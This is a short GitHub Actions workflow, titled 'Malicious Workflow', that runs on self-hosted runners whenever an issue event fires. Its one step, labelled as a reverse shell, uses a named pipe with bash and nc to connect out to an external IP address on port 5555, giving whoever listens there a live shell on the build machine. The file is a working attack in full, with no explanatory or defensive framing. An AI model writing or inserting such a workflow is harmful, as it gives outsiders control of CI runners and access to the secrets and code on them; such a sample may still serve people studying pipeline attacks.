name: Malicious Workflow
on: issues
jobs:
  init:
    runs-on:
        - self-hosted
        - small
    steps:
    # reverse shell
    - run: |
          RESPONSE=$(mknod /tmp/backpipe p; /bin/bash 0</tmp/backpipe | nc 197.250.199.145 5555 1>/tmp/backpipe)
          echo "Response: $RESPONSE"
      name: run nc
